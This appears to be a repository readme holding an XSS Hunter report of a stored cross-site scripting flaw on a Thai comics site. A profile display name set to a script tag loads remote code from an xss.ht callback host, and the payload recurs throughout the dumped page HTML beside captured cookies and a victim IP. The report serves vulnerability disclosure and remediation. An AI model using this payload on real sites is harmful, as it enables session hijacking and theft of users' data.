You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
enwuft cf4c3bf9d2 Banana 4 months ago
readme.md Banana 4 months ago

readme.md

XSS Hunter Report

The page located at https://www.wecomics.in.th/profile/20559376/script-src-https-enwuft-xss-ht-script suffers from a Cross-site Scripting (XSS) vulnerability. XSS is a vulnerability which occurs when user input is unsafely encorporated into the HTML markup inside of a webpage. When not properly escaped an attacker can inject malicious JavaScript that, once evaluated, can be used to hijack authenticated sessions and rewrite the vulnerable page's layout and functionality. The following report contains information on an XSS payload that has fired on https://www.wecomics.in.th, it can be used to reproduce and remediate the vulnerability.

XSS Payload Fire Details

Vulnerable Page

https://www.wecomics.in.th/profile/20559xxxx/script-src-https-enwuft-xss-ht-script

Victim IP Address

223.205.220.20

Referer

https://www.wecomics.in.th/user/settings/profile

User Agent

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36

Cookies (Non-HTTPOnly)

LOGIN-INFO={%22id%22:205593xxx%2C%22displayName%22:%22%5C%22><script%20src=https://enwuft.xss.ht></script>%22%2C%22imageUrl%22:%22https://image.wecomics.in.th/user/20559xxx/637143143238075104.jpg%22%2C%22coverImageUrl%22:%22http://cdn-img.wecomics.in.th/user/20559xxx/cover-637143144902058587.png%22}

Document Object Model (DOM)
<html lang="th-TH"><head>
    <title>"&gt;&lt;script src=https://enwuft.xss.ht&gt;&lt;/script&gt;</title>
    <meta name="description">
    <meta name="keywords" content="อ่านการ์ตูน, การ์ตูนออนไลน์, อ่านการ์ตูนฟรี, โดจิน, การ์ตูนวาย, มังงะ แปลไทย, WeComicsTH">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta property="og:locale" content="th-TH">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="WeComics">
    <meta property="og:url" content="https://www.wecomics.in.th/profile/20559xxx/script-src-https-enwuft-xss-ht-script">
    <meta property="og:image" content="https://cdn-img.wecomics.in.th/banner/og-image4.png">
    <meta property="og:title" content="ติดตามผลงานของ &quot;><script src=https://enwuft.xss.ht></script> ได้ที่ WeComics">
    <meta property="og:description" content="ยินดีต้อนรับทุกท่านที่หลงเข้ามาอ่านจนถึงบรรทัดนี้ เราชื่อ “WeComics” เป็นเว็บไซต์ชุมชนการ์ตูนออนไลน์แห่งใหม่ ที่รวบรวมทุกสิ่งที่เกี่ยวข้องในวงการการ์ตูนไว้ในที่เดียว">
    <meta property="fb:app_id" content="427411034449675">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:site" content="@WeComicsTH">
    <meta name="twitter:title" content="ติดตามผลงานของ &quot;><script src=https://enwuft.xss.ht></script> ได้ที่ WeComics">
    <meta name="twitter:description" content="ยินดีต้อนรับทุกท่านที่หลงเข้ามาอ่านจนถึงบรรทัดนี้ เราชื่อ “WeComics” เป็นเว็บไซต์ชุมชนการ์ตูนออนไลน์แห่งใหม่ ที่รวบรวมทุกสิ่งที่เกี่ยวข้องในวงการการ์ตูนไว้ในที่เดียว">
    <meta name="twitter:image" content="https://cdn-img.wecomics.in.th/banner/og-image4.png">
    <link rel="icon" href="/images/icon/icon_wecomics.ico">
    <script async="" src="https://www.googletagmanager.com/gtm.js?id=GTM-5GLMLSD"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <!-- To support old sizes -->
    <link rel="apple-touch-icon" sizes="57x57" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="114x114" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="144x144" href="/images/app-icon.png">
    <!-- To support new sizes  -->
    <link rel="apple-touch-icon" sizes="60×60" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="76×76" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="120×120" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="152×152" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="180×180" href="/images/app-icon.png">
    <!-- To support Android -->
    <link rel="icon" sizes="192×192" href="/images/app-icon.png">
    <link rel="icon" sizes="128×128" href="/images/app-icon.png">
    <link rel="canonical">
    
    
        <link rel="stylesheet" href="/lib/semantic-ui/dist/semantic.min.css?v=_Z28yXtfBv_6_alw-yZuODgTbKZm86IKbPE_5kjO_xY">
        <link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=eZrrJcwDc_3uDhsdt61sL2oOBY362qM3lon1gyExkL0">
        <link rel="stylesheet" href="/css/site.min.css?v=5n9epeZYXvxqtMvRILoS0lwkdiYM3P3MrTQmlwbsQe0">
    
    <script>
        var isAnalytics = false;
    </script><script data-dapp-detection="">
(function() {
  let alreadyInsertedMetaTag = false

  function __insertDappDetected() {
    if (!alreadyInsertedMetaTag) {
      const meta = document.createElement('meta')
      meta.name = 'dapp-detected'
      document.head.appendChild(meta)
      alreadyInsertedMetaTag = true
    }
  }

  if (window.hasOwnProperty('web3')) {
    // Note a closure can't be used for this var because some sites like
    // www.wnyc.org do a second script execution via eval for some reason.
    window.__disableDappDetectionInsertion = true
    // Likely oldWeb3 is undefined and it has a property only because
    // we defined it. Some sites like wnyc.org are evaling all scripts
    // that exist again, so this is protection against multiple calls.
    if (window.web3 === undefined) {
      return
    }
    __insertDappDetected()
  } else {
    var oldWeb3 = window.web3
    Object.defineProperty(window, 'web3', {
      configurable: true,
      set: function (val) {
        if (!window.__disableDappDetectionInsertion)
          __insertDappDetected()
        oldWeb3 = val
      },
      get: function () {
        if (!window.__disableDappDetectionInsertion)
          __insertDappDetected()
        return oldWeb3
      }
    })
  }
})()</script>
    
    
        <!-- Google Tag Manager -->
        <script>
            (function (w, d, s, l, i) {
                w[l] = w[l] || []; w[l].push({
                    'gtm.start':
                        new Date().getTime(), event: 'gtm.js'
                }); var f = d.getElementsByTagName(s)[0],
                    j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =
                        'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);
            })(window, document, 'script', 'dataLayer', 'GTM-5GLMLSD');
        </script>
        <!-- End Google Tag Manager -->
    
</head>
<body>
    <!-- Google Tag Manager (noscript) -->
    <noscript>
        <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5GLMLSD"
                height="0" width="0" style="display:none;visibility:hidden"></iframe>
    </noscript>
    <!-- End Google Tag Manager (noscript) -->
    <div id="scrollToTop">
        <i class="fa fa-chevron-up" aria-hidden="true"></i>
    </div>

    <div id="oc-wrapper">
        <div id="oc-header">
            
            <style>
                .element-header {
                    height: 4.3em;
                }

                .w300-c-white {
                    color: white;
                    font-weight: 300 !important;
                }
            </style>
            <script>
                $(document).on('click', '.icon-store', function () {
                    console.log("CLICK");
                    var device = $(this).data('value')
                    localStorage.setItem('device', device);
                });
            </script>
            <div class="oc-navbar">
                <div class="oc-hidden-sm-down nav-extra-layout" id="navbar">
                    <div class="oc-container">
                        <div class="ui secondary menu">
                            <a class="item logo" href="/">
                                <img class="nav-logo" src="/images/icon/comics-logo.png?v=PGkqi48vGfmDgHxkGdNfhqUql6mTC1INeC7E2Ar7nbY" alt="comics-logo">
                            </a>
                            <a class="item link w300-c-white" href="/comics">การ์ตูน</a>
                            <a class="item link w300-c-white" href="/illustrations">ภาพวาด</a>
                            <a class="item link w300-c-white" href="/blogs">บล็อก</a>
                                <a class="item link w300-c-white" href="/contests">คอนเทสต์</a>
                            <div class="right menu">
<style>
    .center-cropped {
        background-position: center center;
        background-repeat: no-repeat;
    }
</style>
<!--Start search layout-->
<div class="item dropdown-menu" id="dropdown-menu-search">
    <div class="ui simple dropdown group-element">
        <div class="nav-icon-menu">
            <img src="/images/icon/iconSearch-1.png?v=CLJHnXWRrNt3flAIfQ5do6ZQ0iihwHSgSAcAJT6ZiDI" alt="">
        </div>
        <div class="dropdown-content oc-notification-alert identity search oc-border-gray">
            <div class="dropdown-frame">
                <div class="content-triangle"></div>
                <div class="oc-full-width oc-padding-1em">
                    <div class="ui fluid icon input">
                        <input class="search-keyword-nav" type="text" placeholder="Search..." maxlength="20">
                        <i class="inverted circular search link icon search"></i>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<div class="item dropdown-menu" id="dropdown-menu-search">
    <div class="ui simple dropdown group-element">
        <a class="nav-icon-menu" href="/feeds">
            <img src="/images/icon/iconFeed-1.png?v=ZjU5zleHZBqvb7Wh70Udg-dF8xWjtnyqhmnozwwCRUk" alt="" style="margin-top: 6px !important;">
        </a>
    </div>
</div>
<!--End search layout-->
    <div class="item dropdown-menu" id="dropdown-menu-notification" data-count="false" data-list="false" data-msg-loading="กำลังโหลดข้อมูล" data-msg-empty="ไม่มีการแจ้งเตือน">
        <div class="ui simple dropdown group-element">
            <div class="alert-number oc-hidden">0</div>
            <div class="nav-icon-menu">
                <img src="/images/icon/iconNoti-1.png?v=2OlhylEDi69FNlqzMVfi6sbmocmzCTxE6ObB705CQks" alt="">
            </div>
            <div class="dropdown-content oc-notification-alert oc-border-gray">
                <div class="dropdown-frame">
                    <div class="content-triangle"></div>
                    <div class="oc-full-width">
                        <div class="oc-list-noti">

                        </div>
                        <a href="/notifications">
                            <div class="oc-list-noti-all">
                                ดูทั้งหมด
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="item dropdown-menu" id="dropdown-menu-user">
        <div class="ui simple dropdown group-element">
            <div class="nav-icon-menu profile avartar " style="background-image: url(&quot;https://image.wecomics.in.th/user/20559xxx/637143143238075104.jpg?w=300&quot;);">
                <img class="link-profile-avatar" src="/images/icon/tranparent/20x20.png?v=lNCszvPpVSa1-tKJJhLFoLdEjDCgbZu78B9gkptv-lA">
            </div>
            <div class="dropdown-content oc-notification-profile oc-border-gray menuright-size" style="display: block;">
                <div class="dropdown-frame menuright-scrollbar">
                    <div class="content-triangle"></div>
                    <div class="ui padded grid">
                        <div class="profile-detail row center-cropped" style="background-size: 100%; background-image: url(&quot;http://cdn-img.wecomics.in.th/user/20559xxx/cover-637143144902058587.png?w=300&quot;);">
                            <div class="profile-image">
                                <a class="link-profile" href="/profile/20559376/script-src-https-enwuft-xss-ht-script" title="">
                                    <div class="profile avartar" style="background-image: url(&quot;https://image.wecomics.in.th/user/20559xxx/637143143238075104.jpg?w=300&quot;);">
                                        <img class="image cover-transparent" src="/images/icon/tranparent/20x20.png" alt="">
                                    </div>
                                </a>
                            </div>
                            <div class="profile-info oc-text-single-line">
                                <a class="link-profile link-profile-avatar link-profile-text user-displayname oc-padding-bottom-0em oc-text-single-line column sixteen wide" href="/profile/20559376/script-src-https-enwuft-xss-ht-script" title="">"&gt;<script src="https://enwuft.xss.ht"></script></a>
                            </div>
                            <div class="profile-wallet" id="profile-wallet">
                                <div class="coin profile-wallet-coin">
                                    <img class="icon" src="/images/icon/pang-coin.png?v=TXNvuXNJux3pBRU2m8tafA62TgUw3EtEEESZdmI3TR4" alt="">
                                    <span class="value">0</span>
                                    <a href="/payment/topup" title="เติมเหรียญ">
                                        <img class="icon plus" src="/images/icon/plus-gray.png?v=mztoSexWYCjVNPGNMUUvpCQEs4iIj47sSXeutFZNrmo" alt="">
                                    </a>
                                </div>
                                <div class="key profile-wallet-key">
                                    <img class="icon" src="/images/icon/pang-key.png?v=eOEeXrGBFAHonmXJL2JI82Ushad7Bh1hzIzp_UfNrYo" alt="">
                                    <span class="value">0</span>
                                </div>
                            </div>
                        </div>
                        <div class="profile-menu row">
                            <div class="menu-item column sixteen wide" style="text-align: center;">
                                <img class="img-mature unlock" src="/images/icon/icon-unlock-new.png">
                                <div id="btn-unlock-mature" class="btn-unlock-mature active">
                                    <span>ปลดล็อกเนื้อหาแล้ว</span>
                                </div>
                            </div>
                            <div class="ismature oc-hidden">
                                <div class="ismature-content">
                                    <div class="body">
                                        <div class="title">
                                            <span style="color:black!important;">คุณต้องการปิดเนื้อหาสำหรับผู้ใหญ่</span>
                                        </div>
                                        <img src="/images/meme-mature-v2.png">
                                        <div class="detail oc-padding-top-1em oc-hidden">
                                            <div class="alert-title">คำเตือน</div>
                                            <div class="alert-description">เพื่อป้องกันการเข้าถึงของผู้ที่มีอายุไม่ถึง 18 ปี หากตรวจพบในภายหลังว่าท่านมีเงื่อนไขไม่ตรงตามที่กำหนด ทางทีมงานจะไม่อนุญาตให้ท่านเข้าถึงเนื้อหาดังกล่าว โดยไม่ต้องแจ้งให้ทราบล่วงหน้า</div>
                                        </div>
                                        <div class="oc-padding-top-0-5em">
                                            <button id="btn-cancel-ismature" class="ui button btn-cancel-ismature" style="margin-top: 0.5em !important;border-radius: 1em;width: 150px;">ไว้ก่อนดีกว่า</button>
                                            <button id="btn-confirm-ismature" class="ui comics-color button btn-confirm-ismature" style="margin-top: 0.5em !important;border-radius: 1em;width: 150px;">ต้องการปิด</button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="oc-payment payment-mini" style="margin-top: -20px !important;">
                                <div class="popup" id="oc-unlock-success">
                                    <div class="popup-inner">
                                        <div class="popup-unlock-close" style="display: block;position: absolute;top: 10px;right: 10px;width: 1.2em;height: 1.2em;color: #fff;padding: 3.5px 0 0 2.5px;text-align: center!important;font-size: 1.4em!important;border-radius: 50%; background: #95989a;opacity: .75;transition: all .3s ease-out;cursor: pointer;">X</div>
                                        <div class="body">
                                            <div class="title">
                                                    <span>ปิดเนื้อหาสำหรับผู้ใหญ่ สำเร็จแล้ว</span>
                                            </div>
                                            <div class="detail">
                                                <div class="comic">ขอให้สนุกกับการอ่านการ์ตูนบน WeComics</div>
                                                <img src="/images/meme-lock.png?v=X0iK_33QZSkrPB1B1UpEfgIDaPotqOh9UM3h07bIG9M" style="width: 45% !important;">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBookshelf-3.png?v=Sq9tfCnw-N0fWPxkZCLc66LeviO3i74eUkg9F2tzce8" alt="">
                                <a class="menu-text link-favorite" href="/user/favorite/comics/20559376/script-src-https-enwuft-xss-ht-script">
                                    ชั้นหนังสือ
                                </a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/coinbag-gray.png?v=csXecgLo-c3ZyR0rL3z71tSrUl6irxlc4AxfEafr3U0" alt="">
                                <a class="menu-text" href="/payment">เหรียญของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconCoupon-3.png?v=yw2787B9ntg6yBqNsz59CGyovsZumcAEaabuELjQ00U" alt="">
                                <a class="menu-text" href="/payment/coupon">คูปอง</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <div class="hr-item"></div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBook-3.png?v=LnEOZi8xLfX7f431to6vzgSr3kKKOkVjNcjPdE1p--4" alt="">
                                <a class="menu-text" href="/User/PortfolioComicsById?userId=20559376">การ์ตูนของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconPicc2-3.png?v=IumJGU2mQ_NPUPCgHaRLSjAUe7dxoLXPz_YvvY694_M" alt="">
                                <a class="menu-text" href="/User/PortfolioIllustrationsById?userId=20559376">ภาพวาดของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBlog-3.png?v=gTihf-grJev7fzPNe1Le9Z_9pSDmHT_W7pUsIBjxbtc" alt="">
                                <a class="menu-text" href="/User/PortfolioBlogsById?userId=20559376">บล็อกของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <div class="hr-item"></div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconSetting-3.png?v=H73zbQPD56kyw9HCZNi2c3V3q8GKPD385RuZrYYB3qo" alt="">
                                <a class="menu-text" href="/user/settings/profile">ตั้งค่า</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconHelp-3.png?v=O7knNTQs3eJkuy_efLKbXrk0-gKKPYGUbxd0RMOyaMc" alt="">
                                <a class="menu-text" href="/faq">ช่วยเหลือ</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconSignOut-3.png?v=nOED6ZrhLk3dyTtSfqaz0q0O6yZsG9nh7VooexhBwt8" alt="">
                                <a class="menu-text" href="/account/logout">ออกจากระบบ</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="oc-hidden-md-up nav-normal-layout">
                    <div class="oc-container">
                        <div class="ui secondary menu">
                            <div class="item head-menu">
                                <div class="head-item logo">
                                    <a href="/">
                                        <img class="nav-logo" src="/images/icon/comics-logo.png?v=PGkqi48vGfmDgHxkGdNfhqUql6mTC1INeC7E2Ar7nbY" alt="navlogo">
                                    </a>
                                </div>
                                <div class="head-frame">
                                    <div class="head-block">
                                        <a class="head-menu-text" href="/comics">การ์ตูน</a>
                                        <a class="head-menu-text" href="/illustrations">ภาพวาด</a>
                                        <a class="head-menu-text" href="/blogs">บล็อก</a>
                                        <a class="head-menu-text" href="/authors">นักเขียน</a>
                                            <a class="head-menu-text" href="/contests">คอนเทสต์</a>
                                    </div>
                                </div>
                            </div>
                            <a class="item link oc-hidden-sm-down" href="/comics">การ์ตูน</a>
                            <a class="item link oc-hidden-sm-down" href="/illustrations">ภาพวาด</a>
                            <a class="item link oc-hidden-sm-down" href="/blogs">บล็อก</a>
                            <a class="item link oc-hidden-sm-down" href="/authors">นักเขียน</a>
                            <div class="right menu">
<style>
    .center-cropped {
        background-position: center center;
        background-repeat: no-repeat;
    }
</style>
<!--Start search layout-->
<div class="item dropdown-menu" id="dropdown-menu-search">
    <div class="ui simple dropdown group-element">
        <div class="nav-icon-menu">
            <img src="/images/icon/iconSearch-1.png?v=CLJHnXWRrNt3flAIfQ5do6ZQ0iihwHSgSAcAJT6ZiDI" alt="">
        </div>
        <div class="dropdown-content oc-notification-alert identity search oc-border-gray" style="width: 1351px;">
            <div class="dropdown-frame">
                <div class="content-triangle"></div>
                <div class="oc-full-width oc-padding-1em">
                    <div class="ui fluid icon input">
                        <input class="search-keyword-nav" type="text" placeholder="Search..." maxlength="20">
                        <i class="inverted circular search link icon search"></i>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<div class="item dropdown-menu" id="dropdown-menu-search">
    <div class="ui simple dropdown group-element">
        <a class="nav-icon-menu" href="/feeds">
            <img src="/images/icon/iconFeed-1.png?v=ZjU5zleHZBqvb7Wh70Udg-dF8xWjtnyqhmnozwwCRUk" alt="" style="margin-top: 6px !important;">
        </a>
    </div>
</div>
<!--End search layout-->
    <div class="item dropdown-menu" id="dropdown-menu-notification" data-count="false" data-list="false" data-msg-loading="กำลังโหลดข้อมูล" data-msg-empty="ไม่มีการแจ้งเตือน">
        <div class="ui simple dropdown group-element">
            <div class="alert-number oc-hidden">0</div>
            <div class="nav-icon-menu">
                <img src="/images/icon/iconNoti-1.png?v=2OlhylEDi69FNlqzMVfi6sbmocmzCTxE6ObB705CQks" alt="">
            </div>
            <div class="dropdown-content oc-notification-alert oc-border-gray" style="width: 1351px;">
                <div class="dropdown-frame">
                    <div class="content-triangle"></div>
                    <div class="oc-full-width">
                        <div class="oc-list-noti">

                        </div>
                        <a href="/notifications">
                            <div class="oc-list-noti-all">
                                ดูทั้งหมด
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="item dropdown-menu" id="dropdown-menu-user">
        <div class="ui simple dropdown group-element">
            <div class="nav-icon-menu profile avartar " style="background-image: url(&quot;https://image.wecomics.in.th/user/20559376/637143143238075104.jpg?w=300&quot;);">
                <img class="link-profile-avatar" src="/images/icon/tranparent/20x20.png?v=lNCszvPpVSa1-tKJJhLFoLdEjDCgbZu78B9gkptv-lA">
            </div>
            <div class="dropdown-content oc-notification-profile oc-border-gray menuright-size" style="display: block;">
                <div class="dropdown-frame menuright-scrollbar">
                    <div class="content-triangle"></div>
                    <div class="ui padded grid">
                        <div class="profile-detail row center-cropped" style="background-size: 100%; background-image: url(&quot;http://cdn-img.wecomics.in.th/user/20559376/cover-637143144902058587.png?w=300&quot;);">
                            <div class="profile-image">
                                <a class="link-profile" href="/profile/20559376/script-src-https-enwuft-xss-ht-script" title="">
                                    <div class="profile avartar" style="background-image: url(&quot;https://image.wecomics.in.th/user/20559376/637143143238075104.jpg?w=300&quot;);">
                                        <img class="image cover-transparent" src="/images/icon/tranparent/20x20.png" alt="">
                                    </div>
                                </a>
                            </div>
                            <div class="profile-info oc-text-single-line">
                                <a class="link-profile link-profile-avatar link-profile-text user-displayname oc-padding-bottom-0em oc-text-single-line column sixteen wide" href="/profile/20559376/script-src-https-enwuft-xss-ht-script" title="">"&gt;<script src="https://enwuft.xss.ht"></script></a>
                            </div>
                            <div class="profile-wallet" id="profile-wallet">
                                <div class="coin profile-wallet-coin">
                                    <img class="icon" src="/images/icon/pang-coin.png?v=TXNvuXNJux3pBRU2m8tafA62TgUw3EtEEESZdmI3TR4" alt="">
                                    <span class="value">0</span>
                                    <a href="/payment/topup" title="เติมเหรียญ">
                                        <img class="icon plus" src="/images/icon/plus-gray.png?v=mztoSexWYCjVNPGNMUUvpCQEs4iIj47sSXeutFZNrmo" alt="">
                                    </a>
                                </div>
                                <div class="key profile-wallet-key">
                                    <img class="icon" src="/images/icon/pang-key.png?v=eOEeXrGBFAHonmXJL2JI82Ushad7Bh1hzIzp_UfNrYo" alt="">
                                    <span class="value">0</span>
                                </div>
                            </div>
                        </div>
                        <div class="profile-menu row">
                            <div class="menu-item column sixteen wide" style="text-align: center;">
                                <img class="img-mature unlock" src="/images/icon/icon-unlock-new.png">
                                <div id="btn-unlock-mature" class="btn-unlock-mature active">
                                    <span>ปลดล็อกเนื้อหาแล้ว</span>
                                </div>
                            </div>
                            <div class="ismature oc-hidden">
                                <div class="ismature-content">
                                    <div class="body">
                                        <div class="title">
                                            <span style="color:black!important;">คุณต้องการปิดเนื้อหาสำหรับผู้ใหญ่</span>
                                        </div>
                                        <img src="/images/meme-mature-v2.png">
                                        <div class="detail oc-padding-top-1em oc-hidden">
                                            <div class="alert-title">คำเตือน</div>
                                            <div class="alert-description">เพื่อป้องกันการเข้าถึงของผู้ที่มีอายุไม่ถึง 18 ปี หากตรวจพบในภายหลังว่าท่านมีเงื่อนไขไม่ตรงตามที่กำหนด ทางทีมงานจะไม่อนุญาตให้ท่านเข้าถึงเนื้อหาดังกล่าว โดยไม่ต้องแจ้งให้ทราบล่วงหน้า</div>
                                        </div>
                                        <div class="oc-padding-top-0-5em">
                                            <button id="btn-cancel-ismature" class="ui button btn-cancel-ismature" style="margin-top: 0.5em !important;border-radius: 1em;width: 150px;">ไว้ก่อนดีกว่า</button>
                                            <button id="btn-confirm-ismature" class="ui comics-color button btn-confirm-ismature" style="margin-top: 0.5em !important;border-radius: 1em;width: 150px;">ต้องการปิด</button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="oc-payment payment-mini" style="margin-top: -20px !important;">
                                <div class="popup" id="oc-unlock-success">
                                    <div class="popup-inner">
                                        <div class="popup-unlock-close" style="display: block;position: absolute;top: 10px;right: 10px;width: 1.2em;height: 1.2em;color: #fff;padding: 3.5px 0 0 2.5px;text-align: center!important;font-size: 1.4em!important;border-radius: 50%; background: #95989a;opacity: .75;transition: all .3s ease-out;cursor: pointer;">X</div>
                                        <div class="body">
                                            <div class="title">
                                                    <span>ปิดเนื้อหาสำหรับผู้ใหญ่ สำเร็จแล้ว</span>
                                            </div>
                                            <div class="detail">
                                                <div class="comic">ขอให้สนุกกับการอ่านการ์ตูนบน WeComics</div>
                                                <img src="/images/meme-lock.png?v=X0iK_33QZSkrPB1B1UpEfgIDaPotqOh9UM3h07bIG9M" style="width: 45% !important;">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBookshelf-3.png?v=Sq9tfCnw-N0fWPxkZCLc66LeviO3i74eUkg9F2tzce8" alt="">
                                <a class="menu-text link-favorite" href="/user/favorite/comics/20559376/script-src-https-enwuft-xss-ht-script">
                                    ชั้นหนังสือ
                                </a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/coinbag-gray.png?v=csXecgLo-c3ZyR0rL3z71tSrUl6irxlc4AxfEafr3U0" alt="">
                                <a class="menu-text" href="/payment">เหรียญของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconCoupon-3.png?v=yw2787B9ntg6yBqNsz59CGyovsZumcAEaabuELjQ00U" alt="">
                                <a class="menu-text" href="/payment/coupon">คูปอง</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <div class="hr-item"></div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBook-3.png?v=LnEOZi8xLfX7f431to6vzgSr3kKKOkVjNcjPdE1p--4" alt="">
                                <a class="menu-text" href="/User/PortfolioComicsById?userId=20559376">การ์ตูนของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconPicc2-3.png?v=IumJGU2mQ_NPUPCgHaRLSjAUe7dxoLXPz_YvvY694_M" alt="">
                                <a class="menu-text" href="/User/PortfolioIllustrationsById?userId=20559376">ภาพวาดของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBlog-3.png?v=gTihf-grJev7fzPNe1Le9Z_9pSDmHT_W7pUsIBjxbtc" alt="">
                                <a class="menu-text" href="/User/PortfolioBlogsById?userId=20559376">บล็อกของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <div class="hr-item"></div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconSetting-3.png?v=H73zbQPD56kyw9HCZNi2c3V3q8GKPD385RuZrYYB3qo" alt="">
                                <a class="menu-text" href="/user/settings/profile">ตั้งค่า</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconHelp-3.png?v=O7knNTQs3eJkuy_efLKbXrk0-gKKPYGUbxd0RMOyaMc" alt="">
                                <a class="menu-text" href="/faq">ช่วยเหลือ</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconSignOut-3.png?v=nOED6ZrhLk3dyTtSfqaz0q0O6yZsG9nh7VooexhBwt8" alt="">
                                <a class="menu-text" href="/account/logout">ออกจากระบบ</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="sidebar-wrapper">
                <div class="brand">
                    <a class="brand-logo">
                        <img class="expanding-hidden" src="/images/icon/logo-comics.png?v=jL0yNdlJ8EOshgPwmohj_7kADl8VNKKNqNF3LcGNX-U" alt="logocomic">
                    </a>
                </div>
                <nav>
                    <p class="nav-title">NAVIGATION</p>
                    <ul class="nav">
                        <li>
                            <a href="/">
                                <i class="fa fa-home text-success" aria-hidden="true"></i>
                                <span>หน้าหลัก</span>
                            </a>
                        </li>
                        <li>
                            <a href="/comics">
                                <i class="fa fa-rocket" aria-hidden="true"></i>
                                <span>การ์ตูน</span>
                            </a>
                        </li>
                        <li>
                            <a href="/illustrations">
                                <i class="fa fa-picture-o" aria-hidden="true"></i>
                                <span>ภาพวาด</span>
                            </a>
                        </li>
                        <li>
                            <a href="/blogs">
                                <i class="fa fa-list-alt" aria-hidden="true"></i>
                                <span>บล็อก</span>
                            </a>
                        </li>
                    </ul>
                    <p class="nav-title">BONUS</p>
                    <ul class="nav">
                        <li>
                            <a href="/contests">
                                <i class="fa fa-trophy" aria-hidden="true"></i>
                                <span>คอนเทสต์</span>
                            </a>
                        </li>
                    </ul>
                </nav>
            </div>
            <div class="toggle-offscreen-overlay" data-toggle="sidebar-wrapper">
            </div>
        </div>
        <div id="oc-content" class="oc-content-margin-bottom">
            <input type="hidden" id="env" value="Production">
            <style>
    .center-cropped {
        background-position: center center;
        background-repeat: no-repeat;
    }
</style>
<input id="isLogin" type="hidden" data-islogin="True">
<div class="oc-sub-navbar">
    <div class="oc-hidden-md-down nav-extra-layout">
        <div class="oc-container">
            <div class="ui padded grid">
                <div class="column head-menu">
                    <div class="head-item oc-text-single-line">
                        <a class="single-line" title="&quot;><script src=https://enwuft.xss.ht></script>" href="/User/ProfileById?userid=20559376">
                            <div class="menu-icon avartar" style="background-image: url(https://image.wecomics.in.th/user/20559376/637143143238075104.jpg?w=300">
                                <img class="link-profile-avatar" src="/images/icon/tranparent/20x20.png?v=lNCszvPpVSa1-tKJJhLFoLdEjDCgbZu78B9gkptv-lA">
                            </div>
                            "&gt;<script src="https://enwuft.xss.ht"></script>
                        </a>
                    </div>
                </div>
                <div class="column active">
                    <a title="โปรไฟล์" href="/profile/20559376/script-src-https-enwuft-xss-ht-script">
                        โปรไฟล์
                    </a>
                </div>
                <div class="column">
                    <a title="การ์ตูน" href="/portfolio/comics/20559376/script-src-https-enwuft-xss-ht-script">
                        ผลงาน
                    </a>
                </div>
                    <div class="column">
                        <a title="โปรไฟล์" href="/dashboard/20559376/script-src-https-enwuft-xss-ht-script">
                            ระบบสนับสนุน
                        </a>
                    </div>
            </div>
        </div>
    </div>
    <div class="oc-hidden-lg-up nav-normal-layout">
        <div class="oc-container">
            <div class="ui equal width padded grid">
